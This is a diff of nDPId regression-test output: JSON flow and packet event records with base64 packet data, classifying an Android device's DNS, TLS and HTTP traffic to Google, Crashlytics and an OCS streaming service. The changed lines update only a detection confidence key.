00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"ocs.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786934,"flow_last_seen":1449652786934,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1449652786934,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":48770,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"ocs.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1449652786934,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":72,"pkt_l4_len":52,"thread_ts_msec":1449652786934,"pkt":"RQAASIK5QABAETMxwKi0AggICAi+ggA1ADS3+1EXAQAAAQAAAAAAAAdhbmRyb2lkB2NsaWVudHMGZ29vZ2xlA2NvbQAAAQAB"} -00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"ocs.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786934,"flow_last_seen":1449652786934,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1449652786934,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":48770,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"ocs.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786934,"flow_last_seen":1449652786934,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1449652786934,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":48770,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652787003,"flow_last_seen":1449652787003,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652787003,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"216.58.208.46","src_port":41223,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1449652787003,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652787003,"pkt":"RQAAPLBhQABABm1GwKi0Atg60C6hBwG7mRQyoQAAAACgAjkIAHcAAAIEBbQEAggKADWCwAAAAAABAwMG"} 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1449652787075,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652787075,"pkt":"RQAANLBiQABABm1NwKi0Atg60C6hBwG7mRQyouLMvMiAEADlCc8AAAEBCAoANYLHGASl5Q=="} 00693{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1449652787100,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":236,"pkt_l4_len":216,"thread_ts_msec":1449652787100,"pkt":"RQAA7LBjQABABmyUwKi0Atg60C6hBwG7mRQyouLMvMiAGADlzvUAAAEBCAoANYLKGASl5RYDAQCzAQAArwMBVmhd8vjfjZbbQQM2P+6kSvFiVrQbP+1p3IwwDXzkWPQAAEYABAAFAC8ANcACwATABcAMwA7AD8AHwAnACsARwBPAFAAzADkAMgA4AArAA8ANwAjAEgAWABMACQAVABIAAwAIABQAEQD\/AQAAQAALAAQDAAECAAoANAAyAAEAAgADAAQABQAGAAcACAAJAAoACwAMAA0ADgAPABAAEQASABMAFAAVABYAFwAYABk="} -00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652787003,"flow_last_seen":1449652787100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1449652787100,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"216.58.208.46","src_port":41223,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"5a236bfc3d18ddef1b1f2f4c9e765d66","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652787003,"flow_last_seen":1449652787100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1449652787100,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"216.58.208.46","src_port":41223,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"5a236bfc3d18ddef1b1f2f4c9e765d66","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"ocs.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1449652787155,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652787155,"pkt":"RQAAPCFMQABABqbowKi0AhcV5seZXwG7KAKjIAAAAACgAjkIsy4AAAIEBbQEAggKADWC0AAAAAABAwMG"} 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"ocs.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1449652787273,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652787273,"pkt":"RQAANCFNQABABqbvwKi0AhcV5seZXwG7KAKjIVpZIEyAEADl\/h4AAAEBCAoANYLbl2cJ1g=="} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"ocs.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1449652786152,"flow_last_seen":1449652787289,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1449652787289,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"23.21.230.199","src_port":39263,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Crashlytics","breed":"Acceptable","category":"DataTransfer"},"tls": {"version":"TLSv1","client_requested_server_name":"settings.crashlytics.com","ja3":"b030dba3ca09e2e484b9fa75adc4039c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"ocs.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1449652786152,"flow_last_seen":1449652787289,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1449652787289,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"23.21.230.199","src_port":39263,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Crashlytics","breed":"Acceptable","category":"DataTransfer"},"tls": {"version":"TLSv1","client_requested_server_name":"settings.crashlytics.com","ja3":"b030dba3ca09e2e484b9fa75adc4039c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"ocs.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652787507,"flow_last_seen":1449652787507,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1449652787507,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":3621,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"ocs.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1449652787507,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":77,"pkt_l4_len":57,"thread_ts_msec":1449652787507,"pkt":"RQAATYLzQABAETLywKi0AggICAgOJQA1ADki+CcDAQAAAQAAAAAAAAR4bXBwCGRldmljZTA2BGV1MDEIY2FwcHRhaW4DY29tAAABAAE="} -00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"ocs.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652787507,"flow_last_seen":1449652787507,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1449652787507,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":3621,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"xmpp.device06.eu01.capptain.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"ocs.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652787507,"flow_last_seen":1449652787507,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1449652787507,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":3621,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"xmpp.device06.eu01.capptain.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"ocs.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652787596,"flow_last_seen":1449652787596,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652787596,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.131.52","src_port":46166,"dst_port":5122,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"ocs.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1449652787596,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652787596,"pkt":"RQAAPDy4QABABnydwKi0AomHgzS0VhQCr\/++QwAAAACgAjkI08UAAAIEBbQEAggKADWC+wAAAAABAwMG"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652787983,"flow_last_seen":1449652787983,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652787983,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":49881,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1449652787983,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652787983,"pkt":"RQAAPMDbQABABoIGwKi0ArL40DbC2QBQ64tD+QAAAACgAjkIoRgAAAIEBbQEAggKADWDIgAAAAABAwMG"} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"ocs.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652788016,"flow_last_seen":1449652788016,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1449652788016,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":2589,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"ocs.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1449652788016,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":61,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":61,"pkt_l4_len":41,"thread_ts_msec":1449652788016,"pkt":"RQAAPYMlQABAETLQwKi0AggICAgKHQA1ACmDzlLQAQAAAQAAAAAAAANvY3MIbGFiZ2VuY3kCd3MAAAEAAQ=="} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"ocs.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652788016,"flow_last_seen":1449652788016,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1449652788016,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":2589,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.OCS","breed":"Fun","category":"Media"},"dns": {"query":"ocs.labgency.ws","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"ocs.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652788016,"flow_last_seen":1449652788016,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1449652788016,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":2589,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.OCS","breed":"Fun","category":"Media"},"dns": {"query":"ocs.labgency.ws","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1449652788067,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652788067,"pkt":"RQAANMDcQABABoINwKi0ArL40DbC2QBQ64tD+t7mVuSAEADljSkAAAEBCAoANYMrRwX98w=="} 01332{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1449652788082,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":715,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":715,"pkt_l4_len":695,"thread_ts_msec":1449652788082,"pkt":"RQACy8DdQABABn91wKi0ArL40DbC2QBQ64tD+t7mVuSAGADltWEAAAEBCAoANYMsRwX981BPU1QgL2NhdGFsb2cvdm9kP3Y9MyBIVFRQLzEuMQ0KWC1MZ3ktSHNzLUE6IEZGRTg2OUEyLTMzQUQtQTU0QS1CRUMwLTcyMTBEMDNDODM1Qi0yNTk0RDYzRA0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpYLUxneS1IU1MtU2VydmljZS1JZDogb2ZyLm9jcw0KWC1MZ3ktSFNTLVJvbS1JZDogc2Ftc3VuZy9HVC1QNzUxMC9BbmRyb2lkLzQuMC40L1hXTFA2L2FybXY3bF8xMDAwLjBNSHpfMTk5OC44NEJvZ29NaXBzX2ZlYXR1cmVzKHN3cCxoYWxmLHRodW1iLGZhc3RtdWx0LHZmcCxlZHNwLHZmcHYzLHZmcHYzZDE2LHRscylfY29yZXM9Mi8xMjgweDc1Mi9mYWxzZQ0KQ29udGVudC1MZW5ndGg6IDIxNw0KSG9zdDogb2N1MDMubGFiZ2VuY3kud3MNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEFwYWNoZS1IdHRwQ2xpZW50L1VOQVZBSUxBQkxFIChqYXZhIDEuNCkNCg0KPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPGxneXJlcXVlc3QgbW9kdWxlPSJDTS9WT0QiPgoJPGFjdGlvbiBuYW1lPSJnZXRDYXRhbG9nRW50cmllcyI+CgkJPHBhcmFtIG5hbWU9IndpdGhDdXN0b21EYXRhIiB2YWx1ZT0iZmFsc2UiLz4KCQk8cGFyYW0gbmFtZT0iZXh0ZXJuYWxJZCIgdmFsdWU9ImZhbHNlIi8+Cgk8L2FjdGlvbj4KPC9sZ3lyZXF1ZXN0Pg=="} -00803{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652787983,"flow_last_seen":1449652788082,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":221,"midstream":0,"thread_ts_msec":1449652788082,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":49881,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"},"http": {"hostname":"ocu03.labgency.ws","url":"ocu03.labgency.ws\/catalog\/vod?v=3","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} +00803{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652787983,"flow_last_seen":1449652788082,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":221,"midstream":0,"thread_ts_msec":1449652788082,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":49881,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"},"http": {"hostname":"ocu03.labgency.ws","url":"ocu03.labgency.ws\/catalog\/vod?v=3","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652788109,"flow_last_seen":1449652788109,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652788109,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":36680,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1449652788109,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652788109,"pkt":"RQAAPDlmQABABgl8wKi0ArL40DaPSAG7xoy6SQAAAACgAjkIgeAAAAIEBbQEAggKADWDLwAAAAABAwMG"} 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1449652788188,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652788188,"pkt":"RQAANDlnQABABgmDwKi0ArL40DaPSAG7xoy6Sjpn3PmAEADljD4AAAEBCAoANYM3RwX+EQ=="} 00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1449652788195,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":260,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":260,"pkt_l4_len":240,"thread_ts_msec":1449652788195,"pkt":"RQABBDloQABABgiywKi0ArL40DaPSAG7xoy6Sjpn3PmAGADlDAsAAAEBCAoANYM3RwX+ERYDAQDLAQAAxwMBVmhd83GqZqYQO3oMbwUHPK3VU0gJzqNSdwnP4gncj8QAAEYABAAFAC8ANcACwATABcAMwA7AD8AHwAnACsARwBPAFAAzADkAMgA4AArAA8ANwAjAEgAWABMACQAVABIAAwAIABQAEQD\/AQAAWAAAABQAEgAAD29jcy5sYWJnZW5jeS53cwALAAQDAAECAAoANAAyAAEAAgADAAQABQAGAAcACAAJAAoACwAMAA0ADgAPABAAEQASABMAFAAVABYAFwAYABk="} -00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652788109,"flow_last_seen":1449652788195,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1449652788195,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":36680,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.OCS","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1","client_requested_server_name":"ocs.labgency.ws","ja3":"0534a22b266a64a5cc9a90f7b5c483cc","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652788109,"flow_last_seen":1449652788195,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1449652788195,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":36680,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.OCS","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1","client_requested_server_name":"ocs.labgency.ws","ja3":"0534a22b266a64a5cc9a90f7b5c483cc","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"ocs.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1449652788595,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652788595,"pkt":"RQAAPDy5QABABnycwKi0AomHgzS0VhQCr\/++QwAAAACgAjkI02AAAAIEBbQEAggKADWDYAAAAAABAwMG"} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"ocs.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1449652790602,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652790602,"pkt":"RQAAPDy6QABABnybwKi0AomHgzS0VhQCr\/++QwAAAACgAjkI0pgAAAIEBbQEAggKADWEKAAAAAABAwMG"} 